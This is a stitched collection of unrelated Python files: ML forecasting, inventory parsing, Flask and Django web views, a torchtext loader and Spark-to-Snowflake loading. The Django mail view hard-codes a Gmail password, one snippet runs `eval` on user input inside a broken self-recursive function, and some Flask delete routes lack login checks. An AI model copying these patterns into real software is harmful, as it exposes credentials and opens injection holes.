tb = tb.reset_index()
#divide the dataframe 70-30 for train and test
x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(
tb[['time','temp','day_of_week','weather_dummy']],
tb['meanPeople'],
test_size = 0.33, shuffle = True, random_state= 42)
#Modello tipo Regressione Lineare standard
modelLReg = sklearn.linear_model.LinearRegression()
#provo a dargli in pasto tutto
#prima di questo ora bisogna dividere tutto il dataset in 70-30
modelLReg.fit(x_train, y_train)
# The coefficients
print('Coefficients: \n', modelLReg.coef_)
# The mean square error
print("Residual sum of squares: %.2f" % np.mean((modelLReg.predict(x_test) - y_test) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f' % modelLReg.score(x_test, y_test))
#Modello tipo Forest
modelForest = RandomForestRegressor(n_estimators = 1000)
modelForest.fit(x_train,y_train)
pickle.dump(modelForest, open("modelForest_" + webcam['location'] + ".pkl", "wb"))
print('Forest score : %.2f' % modelForest.score(x_test,y_test))
forest_prediction= modelForest.predict(fc)
plt.title("Random Forest")
forest_prediction = np.rint(forest_prediction)
#ATTENZIONE: CONVERTENDO IN INTERO PERDO LA PRECISIONE.
print(forest_prediction)
plt.plot(fc['time'],modelForest.predict(fc))
# timePred = datetime.today().replace(hour=0, minute=0, second=0, microsecond=0) + timedelta(days = 1)
# timeDelta = timedelta(hours = 1)
# xTime = []
# xtime = np.asarray(xTime)
# for i in range(24):
# xTime.append(timePred+timeDelta*i)
dtPrediction = pandas.DataFrame()
dtPrediction.insert(0,'id_webcam', table['id_webcam'].iloc[0:24])
dtPrediction.insert(1,'city', table['city'].iloc[0:24])
dtPrediction.insert(2,'location', table['location'].iloc[0:24])
dtPrediction.insert(3,'latitude', table['latitude'].iloc[0:24])
dtPrediction.insert(4,'longitude', table['longitude'].iloc[0:24])
dtPrediction.insert(5,'numPeople', forest_prediction[0:24])
dtPrediction.insert(6,'date', forecast['datetime'].iloc[0:24])
dtPrediction.insert(7,'time', forecast['datetime'].iloc[0:24])
dtPrediction.insert(8,'type', int(1))
dtPrediction.insert(9,'weather_description', forecast['weather_description'])
dtPrediction.insert(10,'temperature', forecast['temperature'])
dtPrediction.insert(11,'day_of_week', fc['day_of_week'])
print(dtPrediction)
for i in range(24):
Detection(id_webcam = dtPrediction['id_webcam'][i], city = dtPrediction['city'][i],location = dtPrediction['location'][i],latitude = dtPrediction['latitude'][i],longitude = dtPrediction['longitude'][i],numPeople = dtPrediction['numPeople'][i],date = dtPrediction['date'][i],time = dtPrediction['time'][i],type = dtPrediction['type'][i],weather_description = dtPrediction['weather_description'][i],temperature = dtPrediction['temperature'][i],day_of_week = dtPrediction['day_of_week'][i]).save()
def main():
# load json with webcams data
with open(PATH_WEBCAM_JSON) as f:
json_data = json.load(f)
# wait until midnight
tomorrow = datetime.today() + timedelta(days=1)
midnight = datetime.combine(tomorrow, datetime.min.time())
five_past_midnight = midnight + timedelta(minutes=5)
print( "waiting until: " + str(five_past_midnight) +
";\ntime remaining: " + str(five_past_midnight - datetime.now()) )
#
time.sleep((midnight - datetime.now()).total_seconds())
# infinite loop
while True:
# get next day midnight
tomorrow = datetime.today() + timedelta(days=1)
midnight = datetime.combine(tomorrow, datetime.min.time())
five_past_midnight = midnight + timedelta(minutes=5)
# loop all webcams
for webcam in json_data["webcams"]:
try:
predict(webcam)
except:
print('EXCEPTION OCCURRED')
# # sleep until the next midnight
time.sleep((five_past_midnight - datetime.now()).total_seconds())
main()
|
#!/usr/bin/python3
import sys
import pytz
from cptv import CPTVReader
local_tz = pytz.timezone('Pacific/Auckland')
reader = CPTVReader(open(sys.argv[1], "rb"))
print(reader.timestamp.astimezone(local_tz))
for i, (frame, offset) in enumerate(reader):
print(i, offset, frame.min(), frame.max())
|
# -*- coding: utf-8 -*-
import os
import re
import yaml
import glob
import docutils
from collections import OrderedDict
from docutils import ApplicationError
from docutils.frontend import OptionParser
from docutils.utils import new_document
from docutils.parsers.rst import Parser
from architect import utils
from architect.inventory.client import BaseClient
from architect.inventory.models import Resource, Inventory
from celery.utils.log import get_logger
logger = get_logger(__name__)
class SectionParserVisitor(docutils.nodes.GenericNodeVisitor):
section_tree = []
def visit_section(self, node):
if node.parent is None:
parent = 'document-root'
else:
parents = node.parent['ids']
if len(parents) > 0:
parent = parents[0]
else:
parent = 'document-root'
self.section_tree.append((node['ids'][0], parent,))
def default_visit(self, node):
pass
def reset_section_tree(self):
self.section_tree = []
def get_section_tree(self):
return self.sub_tree('document-root', self.section_tree)
def sub_tree(self, node, relationships):
return {
v: self.sub_tree(v, relationships)
for v in [x[0] for x in relationships if x[1] == node]
}
class HierClusterClient(BaseClient):
class_cache = {}
def __init__(self, **kwargs):
super(HierClusterClient, self).__init__(**kwargs)
def check_status(self):
logger.info('Checking status of hierarchy cluster "{}" ...'.format(self.name))
status = True
if not os.path.exists(self.metadata['formula_dir']):
logger.error('Missing formula dir {}'.format(self.metadata['formula_dir']))
status = False
if not os.path.exists(self.metadata['class_dir']):
logger.error('Missing class dir {}'.format(self.metadata['class_dir']))
status = False
return status
def update_resources(self):
inventory = Inventory.objects.get(name=self.name)
service_formulas = self.list_formulas()
for formula_name, formula in service_formulas.items():
res, created = Resource.objects.get_or_create(
uid=formula_name,
kind='service_formula',
inventory=inventory)
if created:
res.metadata = formula
res.save()
else:
if res.metadata != formula:
res.metadata = formula
res.save()
logger.info('Processed {} service'
' formulas'.format(len(service_formulas)))
classes = self.list_classes()
for class_name, class_meta in classes.items():
cluster_classes = {}
system_classes = {}
service_classes = {}
if '.' not in class_name:
continue
top_name = class_name.split('.')[1]
if class_name.startswith('service.'):
if top_name not in service_classes:
service_classes[top_name] = {}
service_classes[top_name][class_name] = class_meta
res, created = Resource.objects.get_or_create(
uid=class_name,
name=class_name,
kind='service_class',
inventory=inventory)
if created:
res.metadata = class_meta
else:
if res.metadata != class_meta:
res.metadata = class_meta
res.save()
elif class_name.startswith('system.'):
if top_name not in system_classes:
system_classes[top_name] = {}
system_classes[top_name][class_name] = class_meta
res, created = Resource.objects.get_or_create(
uid=class_name,
name=class_name,
kind='system_class',
inventory=inventory)
if created:
res.metadata = class_meta
else:
if res.metadata != class_meta:
res.metadata = class_meta
res.save()
elif class_name.startswith('cluster.'):
if top_name not in cluster_classes:
cluster_classes[top_name] = {}
cluster_classes[top_name][class_name] = class_meta
res, created = Resource.objects.get_or_create(
uid=class_name,
name=class_name,
kind='cluster_class',
inventory=inventory)
if created:
res.metadata = class_meta
else:
if res.metadata != class_meta:
res.metadata = class_meta
res.save()
for unit, unit_classes in cluster_classes.items():
res, created = Resource.objects.get_or_create(
uid=unit,
name=unit,
kind='cluster_unit',
inventory=inventory)
if created:
res.metadata = unit_classes
else:
if res.metadata != unit_classes:
res.metadata = unit_classes
res.save()
for unit, unit_classes in system_classes.items():
res, created = Resource.objects.get_or_create(
uid=unit,
name=unit,
kind='system_unit',
inventory=inventory)
if created:
res.metadata = unit_classes
else:
if res.metadata != unit_classes:
res.metadata = unit_classes
res.save()
logger.info('Processed {} classes'.format(len(classes)))
def get_base_dir(self):
return self.metadata['formula_dir']
def dict_deep_merge(self, a, b, path=None):
"""
Merges dict(b) into dict(a)
"""
if path is None:
path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
self.dict_deep_merge(a[key], b[key], path + [str(key)])
elif a[key] == b[key]:
pass # same leaf value
else:
raise Exception(
'Conflict at {}'.format('.'.join(path + [str(key)])))
else:
a[key] = b[key]
return a
def list_formulas(self):
output = {}
services = glob.glob('{}/*'.format(self.get_base_dir()))
for service in services:
if os.path.exists(service):
service_name = service.split('/')[-1]
try:
readme_data = self.parse_readme_file(service)
except FileNotFoundError as exception:
logger.error(exception)
readme_data = {}
except ApplicationError as exception:
logger.error(exception)
readme_data = {}
output[service_name] = {
'path': service,
'metadata': self.parse_metadata_file(service),
'readme': readme_data,
'schemas': self.parse_schema_files(service),
'support_files': self.parse_support_files(service),
}
return output
def parse_metadata_file(self, formula):
metadata_file = '/{}/metadata.yml'.format(formula)
return utils.load_yaml_json_file(metadata_file)
def parse_readme_file(self, formula):
settings = OptionParser(
components=(Parser,)).get_default_values()
parser = Parser()
input_file = open('{}/README.rst'.format(formula))
input_data = input_file.read()
document = new_document(input_file.name, settings)
parser.parse(input_data, document)
visitor = SectionParserVisitor(document)
visitor.reset_section_tree()
document.walk(visitor)
input_file.close()
return visitor.get_section_tree()
def parse_support_files(self, formula):
output = []
support_files = glob.glob('{}/*/meta/*.yml'.format(formula))
for support_file in support_files:
if os.path.exists(support_file):
service_name = support_file.split('/')[-1].replace('.yml', '')
output.append(service_name)
return output
def parse_schema_files(self, formula):
output = {}
schemas = glob.glob('{}/*/schemas/*.yaml'.format(formula))
for schema in schemas:
if os.path.exists(schema):
role_name = schema.split('/')[-1].replace('.yaml', '')
service_name = schema.split('/')[-3]
name = '{}-{}'.format(service_name, role_name)
output[name] = {
'path': schema,
# 'valid': schema_validate(service_name, role_name)[name]
}
return output
def walk_classes(self, ret_classes=True, ret_errors=False):
'''
Returns classes if ret_classes=True, else returns soft_params if
ret_classes=False
'''
path = self.metadata['class_dir']
classes = {}
soft_params = {}
errors = []
# find classes
for root, dirs, files in os.walk(path, followlinks=True):
# skip hidden files and folders in reclass dir
files = [f for f in files if not f[0] == '.']
dirs[:] = [d for d in dirs if not d[0] == '.']
# translate found init.yml to valid class name
if 'init.yml' in files:
class_file = root + '/' + 'init.yml'
class_name = class_file.replace(
path, '')[:-9].replace('/', '.')
classes[class_name] = {'file': class_file}
for f in files:
if f.endswith('.yml') and f != 'init.yml':
class_file = root + '/' + f
class_name = class_file.replace(
path, '')[:-4].replace('/', '.')
classes[class_name] = {'file': class_file}
# read classes
for class_name, params in classes.items():
with open(params['file'], 'r') as f:
# read raw data
raw = f.read()
pr = re.findall('\${_param:(.*?)}', raw)
if pr:
params['params_required'] = list(set(pr))
# load yaml
try:
data = yaml.load(raw)
except yaml.scanner.ScannerError as e:
errors.append(params['file'] + ' ' + str(e))
pass
if type(data) == dict:
if data.get('classes'):
params['includes'] = data.get('classes', [])
if data.get('parameters') and \
data['parameters'].get('_param'):
params['params_created'] = data['parameters']['_param']
if not(data.get('classes') or data.get('parameters')):
errors.append('{} file missing classes and '
'parameters'.format(params['file']))
else:
errors.append(params['file'] + ' ' + 'is not valid yaml')
if ret_classes:
return classes
elif ret_errors:
return errors
# find parameters and its usage
for class_name, params in classes.items():
for pn, pv in params.get('params_created', {}).items():
# create param if missing
if pn not in soft_params:
soft_params[pn] = {'created_at': {}, 'required_at': []}
# add created_at
if class_name not in soft_params[pn]['created_at']:
soft_params[pn]['created_at'][class_name] = pv
for pn in params.get('params_required', []):
# create param if missing
if pn not in soft_params:
soft_params[pn] = {'created_at': {}, 'required_at': []}
# add created_at
soft_params[pn]['required_at'].append(class_name)
return soft_params
def list_classes(self, prefix=None):
'''
Returns list of all classes defined in reclass inventory. You can
filter returned classes by prefix.
'''
if len(self.class_cache) > 0:
return self.class_cache
data = self.walk_classes(ret_classes=True)
return_data = {}
for name, datum in data.items():
name = name[1:]
if prefix is None:
return_data[name] = datum
elif name.startswith(prefix):
return_data[name] = datum
if len(self.class_cache) == 0:
self.class_cache = OrderedDict(sorted(return_data.items(),
key=lambda t: t[0]))
return self.class_cache
def list_service_classes(self):
return self.list_classes('service.')
def list_system_classes(self):
return self.list_classes('system.')
def list_cluster_classes(self):
return self.list_classes('cluster.')
def get_class(self, name):
'''
Returns detailes information about class file in reclass inventory.
'''
classes = self.list_classes()
return {
name: classes.get(name)
}
|
# -*- coding: utf-8 -*-
from typing import List
class Solution:
def countNegatives(self, grid: List[List[int]]) -> int:
i, j, result = 0, len(grid[0]) - 1, 0
while i < len(grid) and j >= 0:
if grid[i][j] < 0:
j -= 1
result += len(grid) - i
else:
i += 1
return result
if __name__ == "__main__":
solution = Solution()
assert 8 == solution.countNegatives(
[
[4, 3, 2, -1],
[3, 2, 1, -1],
[1, 1, -1, -2],
[-1, -1, -2, -3],
]
)
assert 0 == solution.countNegatives(
[
[3, 2],
[1, 0],
]
)
assert 3 == solution.countNegatives(
[
[1, -1],
[-1, -1],
]
)
assert 1 == solution.countNegatives(
[
[-1],
]
)
|
from flask import Blueprint, render_template, request, flash, jsonify
from flask_login import login_required, current_user
from .models import Bookmark, Note,User,Profiles,Posts ,competitions, internships_job
from . import db
import json
from datetime import datetime, timedelta
import os
views = Blueprint('views', __name__)
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
### Home Page ###
@views.route('/dashboard', methods=['GET'])
@login_required
def home():
quotes=["The gem cannot be polished without friction, nor man perfected without trials.",
"Everyone who got where he is has had to begin where he was.",
"Remember, you can earn more money, but when time is spent is gone forever.",
"It's your aptitude, not just your attitude that determines your ultimate altitude.",
"We will either find a way, or make one.",
"To reach a great height a person needs to have great depth.",
"No dream comes true until you wake up and go to work.",
"Wind to thy wings. Light to thy path. Dreams to thy heart."]
return render_template("menu.html", details=[current_user,quotes])
### Home Page Ends ###
### TaskPage ###
@views.route('/tasks', methods=['GET', 'POST'])
@login_required
def task():
if request.method == 'POST':
note = request.form.get('note')
deadline=request.form.get('task-deadline')
try:
month=['January','February','March','April','May','June','July','August','September','October','November','December']
deadline=deadline.split('T')
task_date=deadline[0].split('-')
task_year=task_date[0]
task_month=month[int(task_date[1])-1]
task_day=task_date[2]
task_time=deadline[1]
present = datetime.now()
flg= present.year==int(task_year) and present.month==int(task_date[1]) and present.day==int(task_day)
if flg and (int(task_time[:2])<present.hour or (int(task_time[:2])==present.hour and int(task_time[3:5])<=present.minute)):
flash('Time has already passed', category='error')
elif (not flg) and datetime(int(task_year),int(task_date[1]),int(task_day)) < present:
flash('Date has already passed', category='error')
elif len(note) < 1:
flash('Note is too short!', category='error')
else:
deadline = task_time + ' ' + task_day + ' ' + task_month + ' ' + task_year
new_note = Note(data=note, date=deadline,user_id=current_user.id)
db.session.add(new_note)
db.session.commit()
except:
if len(note) < 1:
flash('Note is too short!', category='error')
else:
new_note = Note(data=note, date="None",user_id=current_user.id)
db.session.add(new_note)
db.session.commit()
note=""
return render_template("tasks.html", user=current_user)
@views.route('/delete-note', methods=['POST'])
def delete_note():
note = json.loads(request.data)
noteId = note['noteId']
note = Note.query.get(noteId)
if note:
if note.user_id == current_user.id:
db.session.delete(note)
db.session.commit()
return jsonify({})
### TaskPage Ends ###
### Profile Page ###
@views.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
if request.method=='POST':
name = request.form.get('name')
city = request.form.get('city')
country = request.form.get('country')
p_website = request.form.get('personal')
linkedin = request.form.get('linkedin')
github = request.form.get('github')
devfolio = request.form.get('devfolio')
cc = request.form.get('codechef')
cf = request.form.get('codeforces')
ac = request.form.get('atcoder')
hackerrank = request.form.get('hackerrank')
leetcode = request.form.get('leetcode')
hackerearth = request.form.get('hackerearth')
user_n=User.query.get(current_user.id)
user_n.full_name=name
try:
db.session.commit()
except Exception as e:
flash(e,category="error")
db.session.rollback()
user = Profiles.query.filter_by(user_id=current_user.id).first()
if user:
user.codechef=cc
user.codeforces=cf
user.atcoder=ac
user.hackerrank=hackerrank
user.leetcode=leetcode
user.hackerearth=hackerearth
user.github=github
user.devfolio=devfolio
user.pwebsite=p_website
user.linkedin=linkedin
user.city=city
user.country=country
try:
db.session.commit()
except Exception as e:
flash(e, category="error")
db.session.rollback()
else:
pf = Profiles(codechef=cc,codeforces=cf,atcoder=ac,hackerrank=hackerrank,leetcode=leetcode,
hackerearth=hackerearth,github=github,devfolio=devfolio,pwebsite=p_website,linkedin=linkedin,
city=city,country=country,user_id=current_user.id)
db.session.add(pf)
db.session.commit()
print(current_user.profiles[0])
return render_template("profile.html", user=current_user)
user = Profiles.query.filter_by(user_id=current_user.id).first()
if user:
return render_template("profile.html",user=current_user)
pf = Profiles(user_id=current_user.id)
db.session.add(pf)
db.session.commit()
return render_template("profile.html", user=current_user)
### Profile Page Ends ###
### Post ###
@views.route('/inputpost', methods=['GET','POST'])
@login_required
def inputpost():
if request.method=='POST':
title = request.form.get('title')
content = request.form.get('content')
type=request.form.get('type')
present=datetime.now()
date=present.strftime("%d-%m-%Y")
img_link=request.form.get('links')
post = Posts(title=title,content=content,type=type,date=date,img_link=img_link,contactid=current_user.email,author=current_user.full_name,rel_institution=current_user.institution_name,user_id=current_user.id)
db.session.add(post)
db.session.commit()
return render_template("postinput.html", user=current_user)
return render_template("postinput.html", user=current_user)
@views.route('/buyorsell', methods=['GET'])
@login_required
def buyorsell():
posts = Posts.query.filter_by(type="BuyorSell",rel_institution=current_user.institution_name).all()
return render_template("posts.html", det=[current_user,posts])
@views.route('/lostandfound', methods=['GET'])
@login_required
def lostandfound():
posts = Posts.query.filter_by(type="LostandFound",rel_institution=current_user.institution_name).all()
return render_template("posts.html", det=[current_user,posts])
@views.route('/others', methods=['GET'])
@login_required
def otherposts():
posts = Posts.query.filter_by(type="Others",rel_institution=current_user.institution_name).all()
return render_template("posts.html", det=[current_user,posts])
@views.route('/myposts', methods=['GET'])
@login_required
def myposts():
posts = Posts.query.filter_by(user_id=current_user.id).all()
return render_template("myposts.html", det=[current_user,posts])
@views.route('/delete-post', methods=['POST'])
def delete_post():
post = json.loads(request.data)
postId = post['postId']
post = Posts.query.get(postId)
if post:
if post.user_id == current_user.id:
db.session.delete(post)
db.session.commit()
return jsonify({})
### Post Ends ###
### bookmarks views and forms ###
@views.route('/createbookmark', methods=['GET','POST'])
@login_required
def inputbookmark():
if request.method=='POST':
data = request.form.get('content')
page_link=request.form.get('links')
if data and page_link:
bookmark = Bookmark(data=data,page_link=page_link,user_id=current_user.id)
db.session.add(bookmark)
db.session.commit()
else:
flash("Fill all the required credentials")
return render_template("createbookmark.html", user=current_user)
@views.route('/bookmarks', methods=['GET'])
@login_required
def viewbookmark():
return render_template("bookmark.html", user=current_user)
@views.route('/delete-bookmark', methods=['POST'])
def delete_bookmark():
bookmark = json.loads(request.data)
bookmarkId = bookmark['bookId']
bookmark = Bookmark.query.get(bookmarkId)
if bookmark:
if bookmark.user_id == current_user.id:
db.session.delete(bookmark)
db.session.commit()
return jsonify({})
### bookmarks views and forms Ends ###
### Internship/ views and forms ###
@views.route('/internships', methods=['GET'])
@login_required
def internship():
internships = internships_job.query.filter_by(type="INTERN").all()
return render_template("job_internships.html", det=[current_user,internships])
@views.route('/jobs', methods=['GET'])
@login_required
def fulltime_offers():
jobs = internships_job.query.filter_by(type="FULL TIME").all()
return render_template("job_internships.html", det=[current_user,jobs])
@views.route('/jobinternform', methods=['GET', 'POST'])
@login_required
def jobinternform():
if request.method == 'POST':
company = request.form.get('org')
type =request.form.get('type')
role=request.form.get('role')
stipend_sal=request.form.get('stipend')
duration= request.form.get('duration')
role_desc=request.form.get('desc')
deadline=request.form.get('deadline')
extra_benefits=request.form.get('extras')
reg_link=request.form.get('link')
open_to=request.form.get('author')
try:
month=['January','February','March','April','May','June','July','August','September','October','November','December']
deadline=deadline.split('T')
opp_date=deadline[0].split('-')
opp_year=opp_date[0]
opp_month=month[int(opp_date[1])-1]
opp_day=opp_date[2]
opp_time=deadline[1]
deadline = opp_time + ' ' + opp_day + ' ' + opp_month + ' ' + opp_year
new_opp = internships_job(company=company,type=type,role=role,stipend_sal=stipend_sal,duration=duration,role_desc=role_desc,deadline=deadline,extra_benefits=extra_benefits,author=current_user.full_name,reg_link=reg_link,open_to=open_to,user_id=current_user.id)
db.session.add(new_opp)
db.session.commit()
except:
flash("Error While Submission ",category="error")
return render_template("job_internshipform.html", user=current_user)
@views.route('/delete-jobintern', methods=['POST'])
def delete_job():
job = json.loads(request.data)
jobId = job['jobId']
job = internships_job.query.get(jobId)
if job:
if job.user_id == current_user.id:
db.session.delete(job)
db.session.commit()
return jsonify({})
### Internship & Jobs views and forms Ends ###
### Competition views and forms ###
@views.route('/competition', methods=['GET'])
@login_required
def competition():
competitions_ =competitions.query.all()
return render_template("competition.html", det=[current_user,competitions_])
@views.route('/competitionform', methods=['GET', 'POST'])
@login_required
def competitionform():
if request.method == 'POST':
title = request.form.get('title')
organization = request.form.get('org')
content =request.form.get('content')
deadline=request.form.get('deadline')
fromdate=request.form.get('fromdate')
todate=request.form.get('todate')
open_to=request.form.get('open_to')
reg_link=request.form.get('link')
try:
def daycal(deadline):
month=['January','February','March','April','May','June','July','August','September','October','November','December']
deadline=deadline.split('T')
opp_date=deadline[0].split('-')
opp_year=opp_date[0]
opp_month=month[int(opp_date[1])-1]
opp_day=opp_date[2]
opp_time=deadline[1]
return opp_time + ' ' + opp_day + ' ' + opp_month + ' ' + opp_year
deadline=daycal(deadline)
fromdate=daycal(fromdate)
todate=daycal(todate)
new_competition = competitions(organization=organization,title=title,content=content,deadline=deadline,fromdate=fromdate,todate=todate,author=current_user.full_name,reg_link=reg_link,open_to=open_to,user_id=current_user.id)
db.session.add(new_competition)
db.session.commit()
except:
flash("Error While Submission ",category="error")
return render_template("competitionform.html", user=current_user)
@views.route('/delete-competition', methods=['POST'])
def delete_competition():
competition = json.loads(request.data)
competitionId = competition['compId']
competition = competitions.query.get(competitionId)
if competition:
if competition.user_id == current_user.id:
db.session.delete(competition)
db.session.commit()
return jsonify({})
### competition views and forms Ends ### |
import os
from io import open
import torch
from ..data import Dataset, Field, Example, Iterator
class BABI20Field(Field):
def __init__(self, memory_size, **kwargs):
super(BABI20Field, self).__init__(**kwargs)
self.memory_size = memory_size
self.unk_token = None
self.batch_first = True
def preprocess(self, x):
if isinstance(x, list):
return [super(BABI20Field, self).preprocess(s) for s in x]
else:
return super(BABI20Field, self).preprocess(x)
def pad(self, minibatch):
if isinstance(minibatch[0][0], list):
self.fix_length = max(max(len(x) for x in ex) for ex in minibatch)
padded = []
for ex in minibatch:
# sentences are indexed in reverse order and truncated to memory_size
nex = ex[::-1][:self.memory_size]
padded.append(
super(BABI20Field, self).pad(nex)
+ [[self.pad_token] * self.fix_length]
* (self.memory_size - len(nex)))
self.fix_length = None
return padded
else:
return super(BABI20Field, self).pad(minibatch)
def numericalize(self, arr, device=None):
if isinstance(arr[0][0], list):
tmp = [
super(BABI20Field, self).numericalize(x, device=device).data
for x in arr
]
arr = torch.stack(tmp)
if self.sequential:
arr = arr.contiguous()
return arr
else:
return super(BABI20Field, self).numericalize(arr, device=device)
class BABI20(Dataset):
urls = ['http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz']
name = ''
dirname = ''
def __init__(self, path, text_field, only_supporting=False, **kwargs):
fields = [('story', text_field), ('query', text_field), ('answer', text_field)]
self.sort_key = lambda x: len(x.query)
with open(path, 'r', encoding="utf-8") as f:
triplets = self._parse(f, only_supporting)
examples = [Example.fromlist(triplet, fields) for triplet in triplets]
super(BABI20, self).__init__(examples, fields, **kwargs)
@staticmethod
def _parse(file, only_supporting):
data, story = [], []
for line in file:
tid, text = line.rstrip('\n').split(' ', 1)
if tid == '1':
story = []
# sentence
if text.endswith('.'):
story.append(text[:-1])
# question
else:
# remove any leading or trailing whitespace after splitting
query, answer, supporting = (x.strip() for x in text.split('\t'))
if only_supporting:
substory = [story[int(i) - 1] for i in supporting.split()]
else:
substory = [x for x in story if x]
data.append((substory, query[:-1], answer)) # remove '?'
story.append("")
return data
@classmethod
def splits(cls, text_field, path=None, root='.data', task=1, joint=False, tenK=False,
only_supporting=False, train=None, validation=None, test=None, **kwargs):
assert isinstance(task, int) and 1 <= task <= 20
if tenK:
cls.dirname = os.path.join('tasks_1-20_v1-2', 'en-valid-10k')
else:
cls.dirname = os.path.join('tasks_1-20_v1-2', 'en-valid')
if path is None:
path = cls.download(root)
if train is None:
if joint: # put all tasks together for joint learning
train = 'all_train.txt'
if not os.path.isfile(os.path.join(path, train)):
with open(os.path.join(path, train), 'w') as tf:
for task in range(1, 21):
with open(
os.path.join(path,
'qa' + str(task) + '_train.txt')) as f:
tf.write(f.read())
else:
train = 'qa' + str(task) + '_train.txt'
if validation is None:
if joint: # put all tasks together for joint learning
validation = 'all_valid.txt'
if not os.path.isfile(os.path.join(path, validation)):
with open(os.path.join(path, validation), 'w') as tf:
for task in range(1, 21):
with open(
os.path.join(path,
'qa' + str(task) + '_valid.txt')) as f:
tf.write(f.read())
else:
validation = 'qa' + str(task) + '_valid.txt'
if test is None:
test = 'qa' + str(task) + '_test.txt'
return super(BABI20,
cls).splits(path=path, root=root, text_field=text_field, train=train,
validation=validation, test=test, **kwargs)
@classmethod
def iters(cls, batch_size=32, root='.data', memory_size=50, task=1, joint=False,
tenK=False, only_supporting=False, sort=False, shuffle=False, device=None,
**kwargs):
text = BABI20Field(memory_size)
train, val, test = BABI20.splits(text, root=root, task=task, joint=joint,
tenK=tenK, only_supporting=only_supporting,
**kwargs)
text.build_vocab(train)
return Iterator.splits((train, val, test), batch_size=batch_size, sort=sort,
shuffle=shuffle, device=device)
|
def input(val):
val=eval(input("enter the choose value:"))
a=5
def compaire(val,a):
if a>val:
print("enter the number is greater")
elif(a<val):
print("entered number is greater than")
|
# Create your views here.
# directory: workstatus/mail
from string import*
from django.http import HttpResponse
from django.template import Context
from django.template.loader import get_template
import workstatus.mail.models
from django.core.mail import send_mail
from datetime import datetime
import feedparser
from django.contrib.auth.models import User
from workstatus.mail.loaddb import addMessage, addUser
from workstatus.mail.models import Message, User
from workstatus.sendingMassEmail.views import *
from datetime import date
import time, os
import smtplib
#Settings
USERNAME="umanage.mpd@gmail.com"
PASSWORD=" yashar2bananapeel"
PROTO="https://"
SERVER="mail.google.com"
PATH="/gmail/feed/atom"
getInitialFeed = feedparser.parse(PROTO + USERNAME + ":" + PASSWORD + "@" + SERVER + PATH)
lastModified = getInitialFeed.entries[0].modified
ignoreList = []
###########################################################################################################
def read(request):
getInitialFeed = feedparser.parse(PROTO + USERNAME + ":" + PASSWORD + "@" + SERVER + PATH)
lastModified = getInitialFeed.entries[0].modified
while True:
scrapedFeed = feedparser.parse(PROTO+USERNAME+":"+PASSWORD+"@"+SERVER+PATH)
scrapedModified = scrapedFeed.entries[0].modified
if lastModified < scrapedModified: #if there is a new message
lastModified = scrapedModified
name1 = scrapedFeed.entries[0].author_detail.name #get details
email1 = scrapedFeed.entries[0].author_detail.email
content = str(scrapedFeed.entries[0].title)
try:
user = User.objects.get(email = email1) #try to get user who sent it from database
except:
x = find(name1,' ')+1 #if user does not exist, create user in database
first = name1[:x]
addUser(name1, email1, first)
user = User.objects.get(email = email1)
time1 = str(scrapedModified) #parse into string so it can be sliced
time2 = time1[:10]+' '+time1[11:19] #edit string into a time that can be parsed
time3 = datetime.strptime(time2, '%Y-%m-%d %H:%M:%S') #parse string into a datetime object
addMessage(user, email1, content, time3) #add new Message object to database
current = str(time.strftime('%X'))
today = date.today()
dayofweek = today.isoweekday()
check(current, dayofweek)
return HttpResponse()
############################################################################################################
def parser(request):
"""Filters through a message to find projects and their work progress status"""
"""Example: What needs to get done: #Project1, #Project2, #Project"""
showEntries = []
m = Message.objects.all()
if len(m) < 10: length = len(m)
else: length = 10
for i in range(0,length):
showEntries.append(m[len(m)-1-i]) #add latest object, which is at end of m
content0 = showEntries[0].content
user0 = showEntries[0].user.username
time0 = str(showEntries[0].time1)
showEntries.remove(showEntries[0])
template = get_template('testing.html')
variables = Context({'showEntries':showEntries, 'content0':content0, 'time0':time0, 'user0':user0})
output = template.render(variables)
return HttpResponse(output)
#############################################################################################################
def user_page(request,username):
user1 = User.objects.get(username=username)
user_msgs = Message.objects.filter(user = user1)
template = get_template('user_page.html')
variables = Context({ 'messages':user_msgs })
output = template.render(variables)
return HttpResponse(output)
|
# Databricks notebook source
# MAGIC %run "Users/mblahay@gmail.com/Demo Credentials"
# COMMAND ----------
#Setting up snowflake authentication
snowflake_options = {
"sfUrl": "https://op82353.east-us-2.azure.snowflakecomputing.com",
"sfUser": sfUser,
"sfPassword": sfPassword,
"sfDatabase": "NORTHWOODS",
"sfSchema": "POV_REPORTING",
"sfWarehouse": "SF_TUTS_WH"
}
# COMMAND ----------
spark.conf.set("fs.azure.account.key.northwoods40954fb03.dfs.core.windows.net", adls_key)
# COMMAND ----------
#Loading the Flights table
(spark.read
.format("csv")
.option("path","abfss://landing@northwoods40954fb03.dfs.core.windows.net/flights")
.option("header",True)
.load()
.write
.format("snowflake")
.mode("overwrite")
.options(**snowflake_options)
.option("dbtable","flights")
.save()
)
# COMMAND ----------
#Loading the Airline table
(spark.read
.format("csv")
.option("path","abfss://landing@northwoods40954fb03.dfs.core.windows.net/airlines")
.option("header",True)
.load()
.write
.format("snowflake")
.mode("overwrite")
.options(**snowflake_options)
.option("dbtable","airlines")
.save()
)
# COMMAND ----------
#Loading the airport table
(spark.read
.format("csv")
.option("path","abfss://landing@northwoods40954fb03.dfs.core.windows.net/airports")
.option("header",True)
.load()
.write
.format("snowflake")
.mode("overwrite")
.options(**snowflake_options)
.option("dbtable","airports")
.save()
)
|
#!/usr/bin/python
from PyQt4.QtCore import Qt, QAbstractTableModel, QVariant
from PyQt4.QtGui import QAction, QFrame, QLabel, QPalette, QStyle
from PyQt4.QtGui import QItemDelegate, QItemSelection, QItemSelectionModel, QSortFilterProxyModel, QTableView
from MeshDevice import MAP_SIZE
FONT_METRICS_CORRECTION = 1.3
MAP_FIELD = 2
MAP_TOTAL = MAP_SIZE + 2 * MAP_FIELD
INVALID_DATA = QVariant()
RAW_ROLE = Qt.UserRole
CHANGED_ROLE = Qt.UserRole + 1
class Column(object):
def __init__(self, number, checked, changing, name, description, fieldName, longestValue = 100, fmt = None, formatter = None):
self.number = number
self.checked = checked
self.changing = changing
self.name = name
self.description = description
self.fieldName = fieldName
self.fmt = fmt
self.formatter = formatter
self.longestValue = self.process(longestValue)
self.headers = { # This really is a part of View, but moving it off here doesn't work well
Qt.DisplayRole: name,
Qt.ToolTipRole: description or name,
